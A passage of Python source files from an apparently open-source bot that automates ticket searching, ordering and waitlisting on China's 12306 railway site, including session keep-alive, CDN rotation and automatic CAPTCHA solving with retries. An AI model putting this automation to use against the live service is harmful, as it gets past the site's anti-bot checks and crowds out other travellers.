self.s.sendall(send_value) # else: # self.s.sendall(default_get_data().format(url, # Referer, # Cookie)) # total_data = "" # while 1: # data = self.s.recv(1024) # total_data += data # if not data: # break # self.close_s() # print(total_data) # return self.recv_data(total_data) def recv_data(self, r_data): cookie = self.get_cookie(r_data) status_code = self.get_status_code(r_data) r_body = self.get_rep_body(r_data) return { "cookie": cookie, "status_code": status_code, "r_body": r_body } @staticmethod def get_cookie(recv_data): """ 提取cookie :param recv_data: :return: """ if not isinstance(recv_data, str): recv_data = str(recv_data) cookies_re = re.compile(r"Set-Cookie: (\S+);") cookies = re.findall(cookies_re, recv_data) return "; ".join(cookies) @staticmethod def get_status_code(recv_data): """ 获取状态码 :return: """ if not isinstance(recv_data, str): recv_data = str(recv_data) http_code_re = re.compile(r"HTTP/1.1 (\S+) ") status_code = re.search(http_code_re, recv_data).group(1) return status_code @staticmethod def get_rep_body(recv_data): """ 获取返回值 :param recv_data: :return: """ if not isinstance(recv_data, str): recv_data = str(recv_data) if recv_data.find("{") != -1 and recv_data.find("}") != -1: data = json.loads(recv_data.split("\n")[-1]) return data else: print(recv_data) if __name__ == "__main__": so = socketUtils('183.232.189.31', 80) train_date = "2018-08-03" from_station = "SZQ" to_station = "CSQ" urls["select_url"]["req_url"] = "https://kyfw.12306.cn" + urls["select_url"]["req_url"].format(train_date, from_station, to_station) result = so.send(urls=urls["select_url"]) print(result) so = socketUtils('183.232.189.31', 80) data = "secretStr=Vgo534nDZiCH8NCvyEPcGepzJoRCjvYr34gKFv5CW1K1XtM6mtKHoiFPjUYvaVKoe06SMhUUpT%2FK%0AxIEIsBD4zHgJPpVyKiTPx80y6OCWhNgcKjib2LLMXMJfgTgh0RKPISjkDjVFmO9p905O%2FegDeKjp%0A1fhIeqCuYraHjNhI0PjQY39BAY4AHLzW0iGgDq8b%2FtpyOY8Td2XfIWNZJCWzgyPkNXOk0HUguB2G%0AKh2T8nlko6zb5ra%2B%2BA%3D%3D&train_date=2018-08-03&back_train_date=2018-08-03&tour_flag=dc&purpose_codes=ADULT&query_from_station_name=深圳&query_to_station_name=长沙&undefined" result1 = so.send(urls=urls["submit_station_url"], data=data) print(result1) # so = 
socketUtils('183.232.189.31', 80) # result = so.send(url="https://kyfw.12306.cn/passport/web/login", s_data="") # print(result) File: inter/CheckOrderInfo.py # coding=utf-8 from collections import OrderedDict from inter.GetQueueCount import getQueueCount from inter.GetRepeatSubmitToken import getRepeatSubmitToken class checkOrderInfo: def __init__(self, session, train_no, set_type, passengerTicketStrList, oldPassengerStr, station_dates, ticket_peoples): self.train_no = train_no self.set_type = set_type self.passengerTicketStrList = passengerTicketStrList self.oldPassengerStr = oldPassengerStr self.station_dates = station_dates self.ticket_peoples = ticket_peoples self.RepeatSubmitToken = getRepeatSubmitToken(session) self.getTicketInfoForPassengerForm = self.RepeatSubmitToken.sendGetRepeatSubmitToken() self.ticketInfoForPassengerForm = self.getTicketInfoForPassengerForm.get("ticketInfoForPassengerForm", "") self.token = self.getTicketInfoForPassengerForm.get("token", "") self.session = self.getTicketInfoForPassengerForm.get("session", "") def data_par(self): """ 参数结构 :return: """ data = OrderedDict() data['bed_level_order_num'] = "000000000000000000000000000000" data['passengerTicketStr'] = self.passengerTicketStrList.rstrip("_{0}".format(self.set_type)) data['oldPassengerStr'] = self.oldPassengerStr data['tour_flag'] = 'dc' data['randCode'] = "" data['cancel_flag'] = 2 data['_json_att'] = "" data['REPEAT_SUBMIT_TOKEN'] = self.token return data def sendCheckOrderInfo(self): """ 检查支付订单,需要提交REPEAT_SUBMIT_TOKEN passengerTicketStr : 座位编号,0,票类型,乘客名,证件类型,证件号,手机号码,保存常用联系人(Y或N) oldPassengersStr: 乘客名,证件类型,证件号,乘客类型 :return: """ CheckOrderInfoUrls = self.session.urls["checkOrderInfoUrl"] data = self.data_par() checkOrderInfoRep = self.session.httpClint.send(CheckOrderInfoUrls, data) data = checkOrderInfoRep.get("data", {}) if data and data.get("submitStatus", False): print (u'车票提交通过,正在尝试排队') ifShowPassCodeTime = int(checkOrderInfoRep["data"]["ifShowPassCodeTime"]) / float(1000) if "ifShowPassCode" in checkOrderInfoRep["data"] and checkOrderInfoRep["data"]["ifShowPassCode"] == "Y": is_need_code = True elif "ifShowPassCode" in checkOrderInfoRep["data"] and checkOrderInfoRep['data']['submitStatus'] is True: is_need_code = False else: is_need_code = False QueueCount = getQueueCount(self.session, is_need_code, ifShowPassCodeTime, self.set_type, self.station_dates, self.train_no, self.ticket_peoples, self.ticketInfoForPassengerForm, self.token, self.oldPassengerStr, self.passengerTicketStrList, ) QueueCount.sendGetQueueCount() elif "errMsg" in data and data["errMsg"]: print(checkOrderInfoRep['data']["errMsg"]) elif 'messages' in checkOrderInfoRep and checkOrderInfoRep['messages']: print (checkOrderInfoRep['messages'][0]) File: inter/Query.py # coding=utf-8 import copy import random import wrapcache from config import urlConf from config.TicketEnmu import ticket from myUrllib.httpUtils import HTTPClient from config.configCommon import seat_conf_2 import TickerConfig class query: """ 查询接口 """ def __init__(self, selectObj, from_station, to_station, from_station_h, to_station_h, _station_seat, station_trains, ticke_peoples_num, station_dates=None, ): self.session = selectObj self.httpClint = HTTPClient(TickerConfig.IS_PROXY) self.httpClint.set_cookies(self.session.cookies) self.urls = urlConf.urls self.from_station = from_station self.to_station = to_station self.from_station_h = from_station_h self.to_station_h = to_station_h self.station_trains = station_trains self._station_seat = _station_seat if 
isinstance(_station_seat, list) else list(_station_seat) self.station_dates = station_dates if isinstance(station_dates, list) else list(station_dates) self.ticket_black_list = dict() self.ticke_peoples_num = ticke_peoples_num def station_seat(self, index): """ 获取车票对应坐席 :return: """ seat = {'商务座': 32, '一等座': 31, '二等座': 30, '特等座': 25, '软卧': 23, '硬卧': 28, '硬座': 29, '无座': 26, '动卧': 33, } return seat[index] def check_is_need_train(self, ticket_info): """ 判断车次是否为想要的车次,如果ticket_info为空,那么就不校验车次,直接返回True :param ticket_info: :return: """ if self.station_dates and self.station_trains: return ticket_info[3] in self.station_trains else: return True def sendQuery(self): """ 查询 :return: """ if TickerConfig.IS_CDN == 1 and self.session.cdn_list: self.httpClint.cdn = self.session.cdn_list[random.randint(4, len(self.session.cdn_list) - 1)] for station_date in self.station_dates: select_url = copy.copy(self.urls["select_url"]) select_url["req_url"] = select_url["req_url"].format(station_date, self.from_station, self.to_station, self.session.queryUrl) station_ticket = self.httpClint.send(select_url) value = station_ticket.get("data", "") if not value: print(u'{0}-{1} 车次坐席查询为空,查询url: https://kyfw.12306.cn{2}, 可以手动查询是否有票'.format( self.from_station_h, self.to_station_h, select_url["req_url"])) else: result = value.get('result', []) if result: for i in value['result']: ticket_info = i.split('|') if self.session.flag: print(f"车次:{ticket_info[3]} 出发站:{self.from_station_h} 到达站:{self.to_station_h} 历时:{ticket_info[10]}" f" 商务/特等座:{ticket_info[32] or '--'}" f" 一等座:{ticket_info[31] or '--'}" f" 二等座:{ticket_info[30] or '--'}" f" 动卧:{ticket_info[33] or '--'}" f" 硬卧:{ticket_info[28] or '--'}" f" 软座:{ticket_info[23] or '--'}" f" 硬座:{ticket_info[29] or '--'}" f" 无座:{ticket_info[26] or '--'}" f" {ticket_info[1] or '--'}") if ticket_info[1] == "预订" and self.check_is_need_train(ticket_info): # 筛选未在开始时间内的车次 for j in self._station_seat: is_ticket_pass = ticket_info[j] if ticket_info[11] == "Y": if is_ticket_pass != '' and is_ticket_pass != '无' and is_ticket_pass != '*': # 过滤有效目标车次 secretStr = ticket_info[0] train_no = ticket_info[2] query_from_station_name = ticket_info[6] query_to_station_name = ticket_info[7] train_location = ticket_info[15] stationTrainCode = ticket_info[3] leftTicket = ticket_info[12] start_time = ticket_info[8] arrival_time = ticket_info[9] distance_time = ticket_info[10] print(start_time, arrival_time, distance_time) seat = j try: ticket_num = int(ticket_info[j]) except ValueError: ticket_num = "有" print(u'车次: {0} 始发车站: {1} 终点站: {2} {3}: {4}'.format(ticket_info[3], self.from_station_h, self.to_station_h, seat_conf_2[j], ticket_num)) if seat_conf_2[j] == "无座" and ticket_info[3][0] in ["G", "D", "C"]: seat = 30 # GD开头的无座直接强制改为二等座车次 if wrapcache.get(train_no): print(ticket.QUERY_IN_BLACK_LIST.format(train_no)) continue else: if ticket_num != "有" and self.ticke_peoples_num > ticket_num: if TickerConfig.IS_MORE_TICKET: print( u"余票数小于乘车人数,当前余票数: {}, 删减人车人数到: {}".format(ticket_num, ticket_num)) is_more_ticket_num = ticket_num else: print(u"余票数小于乘车人数,当前设置不提交,放弃此次提交机会") continue else: print(u"设置乘车人数为: {}".format(self.ticke_peoples_num)) is_more_ticket_num = self.ticke_peoples_num print(ticket.QUERY_C) return { "secretStr": secretStr, "train_no": train_no, "stationTrainCode": stationTrainCode, "train_date": station_date, "query_from_station_name": query_from_station_name, "query_to_station_name": query_to_station_name, "seat": seat, "leftTicket": leftTicket, "train_location": train_location, "code": 
ticket.SUCCESS_CODE, "is_more_ticket_num": is_more_ticket_num, "cdn": self.httpClint.cdn, "status": True, } elif is_ticket_pass == '无' and ticket_info[37] == "1" and TickerConfig.TICKET_TYPE is 2: """ is_ticket_pass如果有别的显示,但是可以候补,可以提issues提出来,附上query log,我将添加上 判断车次是否可以候补 目前的候补机制是只要一有候补位置,立马提交候补 """ # 如果最后一位为1,则是可以候补的,不知道这些正确嘛? nate = list(ticket_info[38]) if wrapcache.get(f"hb{ticket_info[2]}"): continue for set_type in TickerConfig.SET_TYPE: if TickerConfig.PASSENGER_TICKER_STR[set_type] not in nate: if ticket_info[3][0] in ["G", "D", "C"] and set_type in ["一等座", "特等座", "二等座", "商务座", "无座"]: return { "secretList": ticket_info[0], "seat": [set_type], "train_no": ticket_info[2], "status": True, "cdn": self.httpClint.cdn, } elif ticket_info[3][0] in ["T", "Z", "K"] and set_type in ["硬卧", "硬座", "无座", "软座", "软卧"]: return { "secretList": ticket_info[0], "seat": [set_type], "train_no": ticket_info[2], "status": True, "cdn": self.httpClint.cdn, } else: print(u"车次配置信息有误,或者返回数据异常,请检查 {}".format(station_ticket)) self.session.flag = False return {"code": ticket.FAIL_CODE, "status": False, "cdn": self.httpClint.cdn, } if __name__ == "__main__": q = query() File: inter/CheckUser.py # coding=utf-8 import datetime import random import time import wrapcache from config import configCommon from config.TicketEnmu import ticket class checkUser: def __init__(self, session): self.session = session def sendCheckUser(self): """ 检查用户登录, 检查间隔为2分钟 :return: """ CHENK_TIME = 1 while 1: time.sleep(3) # 防止cpu占用过高 configCommon.checkSleepTime(self.session) # 修复晚上查询线程休眠时,检查登录线程为休眠,造成快豆迅速消耗 if wrapcache.get("user_time") is None: check_user_url = self.session.urls["check_user_url"] data = {"_json_att": ""} check_user = self.session.httpClint.send(check_user_url, data) if check_user.get("data", False): check_user_flag = check_user["data"]["flag"] if check_user_flag is True: wrapcache.set("user_time", datetime.datetime.now(), timeout=random.randint(60, 80) * CHENK_TIME) else: if check_user['messages']: print(ticket.LOGIN_SESSION_FAIL.format(check_user['messages'])) self.session.call_login() wrapcache.set("user_time", datetime.datetime.now(), timeout=random.randint(60, 80) * CHENK_TIME) else: print(ticket.LOGIN_SESSION_FAIL.format(check_user['messages'])) self.session.call_login() wrapcache.set("user_time", datetime.datetime.now(), timeout=random.randint(60, 80) * CHENK_TIME) File: inter/LoginConf.py # coding=utf-8 from config.urlConf import urls def loginConf(session): """ 判断登录是否需要验证码 :param session: :return: """ loginConfUrl = urls.get("loginConf") loginConfRsp = session.httpClint.send(urls=loginConfUrl, data={}) if loginConfRsp and loginConfRsp.get("data", {}).get("is_login_passCode") == "N": print(u"不需要验证码") return False else: print(u"需要验证码") return True if __name__ == '__main__': pass File: inter/ConfirmSingleForQueueAsys.py # coding=utf-8 import json import urllib from collections import OrderedDict from inter.QueryOrderWaitTime import queryOrderWaitTime class confirmSingleForQueueAsys: """ 订单快读排队 """ def __init__(self, session, passengerTicketStr, oldPassengerStr, result, randCode="", ): self.session = session self.passengerTicketStr = passengerTicketStr self.oldPassengerStr = oldPassengerStr self.result = result if isinstance(result, str) else str(result) self.randCode = randCode def data_par(self): """ 字段说明 passengerTicketStr 乘客乘车代码 oldPassengerStr 乘客编号代码 randCode 填空 purpose_codes 学生还是成人 key_check_isChange autoSubmitOrderRequest返回的result字段做切割即可 leftTicketStr autoSubmitOrderRequest返回的result字段做切割即可 train_location 
autoSubmitOrderRequest返回的result字段做切割即可 choose_seats seatDetailType _json_att :return: """ results = self.result.split("#") key_check_isChange = results[1] leftTicketStr = results[2] train_location = results[0] data = OrderedDict() data["passengerTicketStr"] = self.passengerTicketStr data["oldPassengerStr"] = self.oldPassengerStr data["randCode"] = self.randCode data["purpose_codes"] = "ADULT" data["key_check_isChange"] = key_check_isChange data["leftTicketStr"] = leftTicketStr data["train_location"] = train_location data["choose_seats"] = "" data["seatDetailType"] = "" data["_json_att"] = "" return data def sendConfirmSingleForQueueAsys(self): """ 请求订单快读排队接口 :return: """ urls = self.session.urls["confirmSingleForQueueAsys"] data = self.data_par() confirmSingleForQueueAsysResult = self.session.httpClint.send(urls, data) if confirmSingleForQueueAsysResult.get("status", False) and confirmSingleForQueueAsysResult.get("data", False): queueData = confirmSingleForQueueAsysResult.get("data", {}) if queueData.get("submitStatus", False): qwt = queryOrderWaitTime(session=self.session) qwt.sendQueryOrderWaitTime() else: print(queueData.get("errMsg", "")) File: inter/LiftTicketInit.py # coding=utf-8 import re class liftTicketInit: def __init__(self, session): self.session = session def reqLiftTicketInit(self): """ 请求抢票页面 :return: """ urls = self.session.urls["left_ticket_init"] # 获取初始化的结果 result = self.session.httpClint.send(urls) # 用正则表达式查出CLeftTicketUrl的值 matchObj = re.search('var CLeftTicketUrl = \'(.*)\'', result, re.M|re.I); if matchObj: # 如果有值,替换queryUrl self.session.queryUrl = matchObj.group(1) return { "status": True } File: inter/__init__.py File: inter/PassengerInitApi.py import datetime import wrapcache import TickerConfig from config.urlConf import urls from inter.ConfirmHB import confirmHB class passengerInitApi: def __init__(self, session, secretList, tickerNo): """ 获取候补信息 """ self.secretList = secretList self.tickerNo = tickerNo self.session = session def sendPassengerInitApi(self): passengerInitApiRsp = self.session.httpClint.send(urls.get("passengerInitApi")) if not passengerInitApiRsp.get("status"): print("".join(passengerInitApiRsp.get("messages")) or passengerInitApiRsp.get("validateMessages")) return data = passengerInitApiRsp.get("data", {}) jzdhDateE = data.get("jzdhDateE") if not data.get("jzdhHourE"): wrapcache.set(key=f"hb{self.tickerNo}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) print(f"获取当前候补日期失败,原因: {data.get('jzdhHourE')}") return jzdhHourE = data.get("jzdhHourE").replace(":", "#") jzdhDate = f"{jzdhDateE}#{jzdhHourE}" print(f"当前候补日期为:{jzdhDateE} {jzdhHourE}") confirm = confirmHB(self.secretList, self.session, self.tickerNo, jzdhDate) confirm.sendChechFace() File: inter/SubmitOrderRequest.py # coding=utf-8 import datetime import urllib from collections import OrderedDict import TickerConfig from config.urlConf import urls from inter.CheckOrderInfo import checkOrderInfo from inter.ConfirmHB import confirmHB from inter.PassengerInitApi import passengerInitApi from myException.ticketIsExitsException import ticketIsExitsException def time(): """ 获取日期 :return: """ today = datetime.date.today() return today.strftime('%Y-%m-%d') class submitOrderRequest: def __init__(self, selectObj, secretStr, from_station, to_station, train_no, set_type, passengerTicketStrList, oldPassengerStr, train_date, ticke_peoples): self.session = selectObj # self.secretStr = secretStr try: self.secretStr = urllib.unquote(secretStr) except AttributeError: 
self.secretStr = urllib.parse.unquote(secretStr) self.from_station = from_station self.to_station = to_station self.to_station = to_station self.train_no = train_no self.set_type = set_type self.passengerTicketStrList = passengerTicketStrList self.oldPassengerStr = oldPassengerStr self.train_date = train_date self.ticke_peoples = ticke_peoples def data_apr(self): """ :return: """ data = [('secretStr', self.secretStr), # 字符串加密 ('train_date', self.train_date), # 出发时间 ('back_train_date', time()), # 返程时间 ('tour_flag', 'dc'), # 旅途类型 ('purpose_codes', 'ADULT'), # 成人票还是学生票 ('query_from_station_name', TickerConfig.FROM_STATION), # 起始车站 ('query_to_station_name', TickerConfig.TO_STATION), # 终点车站 ('undefined', ''), ] return data def sendSubmitOrderRequest(self): """ 提交车次 预定的请求参数,注意参数顺序 注意这里为了防止secretStr被urllib.parse过度编码,在这里进行一次解码 否则调用HttpTester类的post方法将会将secretStr编码成为无效码,造成提交预定请求失败 :param secretStr: 提交车次加密 :return: """ submit_station_url = self.session.urls["submit_station_url"] submitResult = self.session.httpClint.send(submit_station_url, self.data_apr()) if 'data' in submitResult and submitResult['data']: if submitResult['data'] == 'N': coi = checkOrderInfo(self.session, self.train_no, self.set_type, self.passengerTicketStrList, self.oldPassengerStr, self.train_date, self.ticke_peoples) coi.sendCheckOrderInfo() else: print (u'出票失败') elif 'messages' in submitResult and submitResult['messages']: raise ticketIsExitsException(submitResult['messages'][0]) class submitOrderRequestByAfterNate: def __init__(self, session, secretList, tickerNo): """ 提交候补订单 :param secretList: :param session: """ self.secretList = secretList self.session = session self.tickerNo = tickerNo def data_apr(self): """ secretList 9vqa9%2B%2F%2Fsdozmm22hpSeDTGqRUwSuA2D0r%2BmU%2BLZj7MK7CDuf5Ep1xpxl4Dyxfmoah%2BaB9TZSesU%0AkxBbo5oNgR1vqMfvq66VP0T7tpQtH%2BbVGBz1FolZG8jDD%2FHqnz%2FnvdBP416Og6WGS14O%2F3iBSwT8%0AkRPsNF0Vq0U082g0tlJtP%2BPn7TzW3z7TDCceMJIjFcfEOA%2BW%2BuK%2Bpy6jCQMv0TmlkXf5aKcGnE02%0APuv4I8nF%2BOWjWzv9CrJyiCZiWaXd%2Bi7p69V3a9dhF787UgS660%2BqKRFB4RLwAfic3MkAlfpGWhMY%0ACfARVQ%3D%3D#O| _json_att 候补一次只能补一个座位,默认取TICKET_TYPE第一个 :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["secretList"] = f"{self.secretList}#{ticker}|" data["_json_att"] = "" return data def sendSubmitOrderRequest(self, ): submitOrderRequestRsp = self.session.httpClint.send(urls.get("SubmitOrderRequestRsp"), self.data_apr()) if not submitOrderRequestRsp.get("status") or not submitOrderRequestRsp.get("data", {}).get("flag"): print("".join(submitOrderRequestRsp.get("messages")) or submitOrderRequestRsp.get("validateMessages")) return pApi = passengerInitApi(self.session, self.secretList, self.tickerNo) pApi.sendPassengerInitApi() File: inter/ChechFace.py import datetime import urllib from collections import OrderedDict from config.urlConf import urls import TickerConfig from inter.GetSuccessRate import getSuccessRate from myException.ticketConfigException import ticketConfigException import wrapcache class chechFace: def __init__(self, selectObj, secretList, train_no): """ 人脸识别 """ self.secretList = secretList self.session = selectObj self.train_no = train_no def data_apr(self): """ secretList 
9vqa9%2B%2F%2Fsdozmm22hpSeDTGqRUwSuA2D0r%2BmU%2BLZj7MK7CDuf5Ep1xpxl4Dyxfmoah%2BaB9TZSesU%0AkxBbo5oNgR1vqMfvq66VP0T7tpQtH%2BbVGBz1FolZG8jDD%2FHqnz%2FnvdBP416Og6WGS14O%2F3iBSwT8%0AkRPsNF0Vq0U082g0tlJtP%2BPn7TzW3z7TDCceMJIjFcfEOA%2BW%2BuK%2Bpy6jCQMv0TmlkXf5aKcGnE02%0APuv4I8nF%2BOWjWzv9CrJyiCZiWaXd%2Bi7p69V3a9dhF787UgS660%2BqKRFB4RLwAfic3MkAlfpGWhMY%0ACfARVQ%3D%3D#O| _json_att 候补一次只能补一个座位,默认取TICKET_TYPE第一个 :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["secretList"] = f"{self.secretList}#{ticker}|" data["_json_att"] = "" return data def sendChechFace(self): chechFaceRsp = self.session.httpClint.send(urls.get("chechFace"), self.data_apr()) if not chechFaceRsp.get("status"): print("".join(chechFaceRsp.get("messages")) or chechFaceRsp.get("validateMessages")) wrapcache.set(key=f"hb{self.train_no}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) return data = chechFaceRsp["data"] if not data.get("face_flag"): print("".join(chechFaceRsp.get("messages")) or chechFaceRsp.get("validateMessages")) if data.get("face_check_code") == "14": """ 未通过人脸核验 """ raise ticketConfigException("通过人证一致性核验的用户及激活的“铁路畅行”会员可以提交候补需求,请您按照操作说明在铁路12306app.上完成人证核验") elif data.get("face_check_code") in ["12", "02"]: """ 系统忙,请稍后再试! """ print("系统忙,请稍后再试!") wrapcache.set(key=f"hb{self.train_no}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) elif data.get("face_check_code") in ["03", "13"]: """ 证件信息审核失败,请检查所填写的身份信息内容与原证件是否一致。 """ raise ticketConfigException("证件信息审核失败,请检查所填写的身份信息内容与原证件是否一致。") elif data.get("face_check_code") in ["01", "11"]: """ 证件信息正在审核中,请您耐心等待,审核通过后可继续完成候补操作。 """ print("证件信息正在审核中,请您耐心等待,审核通过后可继续完成候补操作。") wrapcache.set(key=f"hb{self.train_no}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) g = getSuccessRate(self.session, self.secretList) g.sendSuccessRate() File: inter/ConfirmSingleForQueue.py # coding=utf-8 import datetime import time from inter.CheckRandCodeAnsyn import checkRandCodeAnsyn from inter.GetPassengerDTOs import getPassengerDTOs from inter.GetRandCode import getRandCode from inter.QueryOrderWaitTime import queryOrderWaitTime class confirmSingleForQueue: def __init__(self, session, ifShowPassCodeTime, is_node_code, token, set_type, ticket_peoples, ticketInfoForPassengerForm, oldPassengerStr, passengerTicketStrList): self.session = session self.ifShowPassCodeTime = ifShowPassCodeTime self.is_node_code = is_node_code self.token = token self.set_type = set_type self.ticket_peoples = ticket_peoples self.ticketInfoForPassengerForm = ticketInfoForPassengerForm self.passengerTicketStrList = passengerTicketStrList self.oldPassengerStr = oldPassengerStr def data_par(self): """ 模拟提交订单是确认按钮,参数获取方法还是get_ticketInfoForPassengerForm 中获取 :return: """ if not self.passengerTicketStrList and not self.oldPassengerStr: s = getPassengerDTOs(session=self.session, ticket_peoples=self.ticket_peoples, set_type=self.set_type) getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr() if getPassengerDTOsResult.get("status", False): self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "") self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "") data = { "passengerTicketStr": self.passengerTicketStrList.rstrip("_{0}".format(self.set_type)), "oldPassengerStr": "".join(self.oldPassengerStr), "purpose_codes": self.ticketInfoForPassengerForm["purpose_codes"], "key_check_isChange": 
self.ticketInfoForPassengerForm["key_check_isChange"], "leftTicketStr": self.ticketInfoForPassengerForm["leftTicketStr"], "train_location": self.ticketInfoForPassengerForm["train_location"], "seatDetailType": "", # 开始需要选择座位,但是目前12306不支持自动选择作为,那这个参数为默认 "roomType": "00", # 好像是根据一个id来判断选中的,两种 第一种是00,第二种是10,但是我在12306的页面没找到该id,目前写死是00,不知道会出什么错 "dwAll": "N", "whatsSelect": 1, "_json_at": "", "randCode": "", "choose_seats": "", "REPEAT_SUBMIT_TOKEN": self.token, } return data def sendConfirmSingleForQueue(self): """ # 模拟查询当前的列车排队人数的方法 # 返回信息组成的提示字符串 :return: """ data = self.data_par() checkQueueOrderUrl = self.session.urls["checkQueueOrderUrl"] try: if self.is_node_code: print(u"正在使用自动识别验证码功能") for i in range(3): randCode = getRandCode(is_auto_code=True, auto_code_type=2) checkcode = checkRandCodeAnsyn(self.session, randCode, self.token) if checkcode == 'TRUE': print(u"验证码通过,正在提交订单") data['randCode'] = randCode break else: print (u"验证码有误, {0}次尝试重试".format(i + 1)) print(u"验证码超过限定次数3次,放弃此次订票机会!") else: print(u"不需要验证码") time.sleep(self.ifShowPassCodeTime) checkQueueOrderResult = self.session.httpClint.send(checkQueueOrderUrl, data) if "status" in checkQueueOrderResult and checkQueueOrderResult["status"]: c_data = checkQueueOrderResult["data"] if "data" in checkQueueOrderResult else {} if 'submitStatus' in c_data and c_data['submitStatus'] is True: qow = queryOrderWaitTime(self.session) qow.sendQueryOrderWaitTime() else: if 'errMsg' in c_data and c_data['errMsg']: print(u"提交订单失败,{0}".format(c_data['errMsg'])) else: print(c_data) print(u'订票失败!很抱歉,请重试提交预订功能!') elif "messages" in checkQueueOrderResult and checkQueueOrderResult["messages"]: print(u"提交订单失败,错误信息: " + checkQueueOrderResult["messages"]) else: print(u"提交订单中,请耐心等待:" + checkQueueOrderResult["message"]) except ValueError: print(u"接口 {} 无响应".format(checkQueueOrderUrl)) File: inter/QueryOrderWaitTime.py # coding=utf-8 import copy import time from config.TicketEnmu import ticket from config.emailConf import sendEmail from config.serverchanConf import sendServerChan from myException.ticketIsExitsException import ticketIsExitsException from myException.ticketNumOutException import ticketNumOutException class queryOrderWaitTime: """ 排队 """ def __init__(self, session): self.session = session def sendQueryOrderWaitTime(self): """ 排队获取订单等待信息,每隔3秒请求一次,最高请求次数为20次! 
:return: """ num = 1 while True: num += 1 if num > ticket.OUT_NUM: print(ticket.WAIT_OUT_NUM) order_id = self.queryMyOrderNoComplete() # 排队失败,自动取消排队订单 if order_id: self.cancelNoCompleteMyOrder(order_id) break try: queryOrderWaitTimeUrl = copy.deepcopy(self.session.urls["queryOrderWaitTimeUrl"]) queryOrderWaitTimeUrl["req_url"] = queryOrderWaitTimeUrl["req_url"].format(int(round(time.time() * 1000))) queryOrderWaitTimeResult = self.session.httpClint.send(queryOrderWaitTimeUrl) except ValueError: queryOrderWaitTimeResult = {} if queryOrderWaitTimeResult: if queryOrderWaitTimeResult.get("status", False): data = queryOrderWaitTimeResult.get("data", False) if data and data.get("orderId", ""): sendEmail(ticket.WAIT_ORDER_SUCCESS.format( data.get("orderId", ""))) sendServerChan(ticket.WAIT_ORDER_SUCCESS.format( data.get("orderId", ""))) raise ticketIsExitsException(ticket.WAIT_ORDER_SUCCESS.format( data.get("orderId"))) elif data.get("msg", False): print(data.get("msg", "")) break elif data.get("waitTime", False): print(ticket.WAIT_ORDER_CONTINUE.format(0 - data.get("waitTime", False))) else: pass elif queryOrderWaitTimeResult.get("messages", False): print(ticket.WAIT_ORDER_FAIL.format(queryOrderWaitTimeResult.get("messages", ""))) else: print(ticket.WAIT_ORDER_NUM.format(num + 1)) else: pass time.sleep(2) else: print(ticketNumOutException(ticket.WAIT_ORDER_SUB_FAIL)) def queryMyOrderNoComplete(self): """ 获取订单列表信息 :return: """ self.initNoComplete() queryMyOrderNoCompleteUrl = self.session.urls["queryMyOrderNoCompleteUrl"] data = {"_json_att": ""} try: queryMyOrderNoCompleteResult = self.session.httpClint.send(queryMyOrderNoCompleteUrl, data) except ValueError: queryMyOrderNoCompleteResult = {} if queryMyOrderNoCompleteResult: if queryMyOrderNoCompleteResult.get("data", False) and queryMyOrderNoCompleteResult["data"].get("orderDBList", False): return queryMyOrderNoCompleteResult["data"] elif queryMyOrderNoCompleteResult.get("data", False) and queryMyOrderNoCompleteResult["data"].get("orderCacheDTO", False): if queryMyOrderNoCompleteResult["data"]["orderCacheDTO"].get("message", False): print(queryMyOrderNoCompleteResult["data"]["orderCacheDTO"]["message"]["message"]) raise ticketNumOutException( queryMyOrderNoCompleteResult["data"]["orderCacheDTO"]["message"]["message"]) else: if queryMyOrderNoCompleteResult.get("message", False): print(queryMyOrderNoCompleteResult.get("message", False)) return False else: return False else: return False def initNoComplete(self): """ 获取订单前需要进入订单列表页,获取订单列表页session :return: """ initNoCompleteUrl = self.session.urls["initNoCompleteUrl"] data = {"_json_att": ""} self.session.httpClint.send(initNoCompleteUrl, data) def cancelNoCompleteMyOrder(self, sequence_no): """ 取消订单 :param sequence_no: 订单编号 :return: """ cancelNoCompleteMyOrderUrl = self.session.urls["cancelNoCompleteMyOrder"] cancelNoCompleteMyOrderData = { "sequence_no": sequence_no, "cancel_flag": "cancel_order", "_json_att": "" } cancelNoCompleteMyOrderResult = self.session.httpClint.send(cancelNoCompleteMyOrderUrl, cancelNoCompleteMyOrderData) if cancelNoCompleteMyOrderResult.get("data", False) and cancelNoCompleteMyOrderResult["data"].get("existError", "N"): print(ticket.CANCEL_ORDER_SUCCESS.format(sequence_no)) time.sleep(2) return True else: print(ticket.CANCEL_ORDER_FAIL.format(sequence_no)) return False File: inter/GetRepeatSubmitToken.py # coding=utf-8 import json import re class getRepeatSubmitToken: def __init__(self, session): self.session = session def sendGetRepeatSubmitToken(self): """ 
获取提交车票请求token :return: token """ initdc_url = self.session.urls["initdc_url"] initdc_result = self.session.httpClint.send(initdc_url, ) token_name = re.compile(r"var globalRepeatSubmitToken = '(\S+)'") ticketInfoForPassengerForm_name = re.compile(r'var ticketInfoForPassengerForm=(\{.+\})?') order_request_params_name = re.compile(r'var orderRequestDTO=(\{.+\})?') token = re.search(token_name, initdc_result).group(1) re_tfpf = re.findall(ticketInfoForPassengerForm_name, initdc_result) re_orp = re.findall(order_request_params_name, initdc_result) if re_tfpf: ticketInfoForPassengerForm = json.loads(re_tfpf[0].replace("'", '"')) else: ticketInfoForPassengerForm = "" if re_orp: order_request_params = json.loads(re_orp[0].replace("'", '"')) else: order_request_params = "" return { "token": token, "ticketInfoForPassengerForm": ticketInfoForPassengerForm, "order_request_params": order_request_params, "session": self.session } File: inter/GetPassCodeNewOrderAndLogin.py # coding=utf-8 import base64 import copy import random def getPassCodeNewOrderAndLogin(session, imgType): """ 下载验证码 :param session: :param imgType: 下载验证码类型,login=登录验证码,其余为订单验证码 :return: """ if imgType == "login": codeImgUrl = copy.deepcopy(session.urls["getCodeImg"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) else: codeImgUrl = 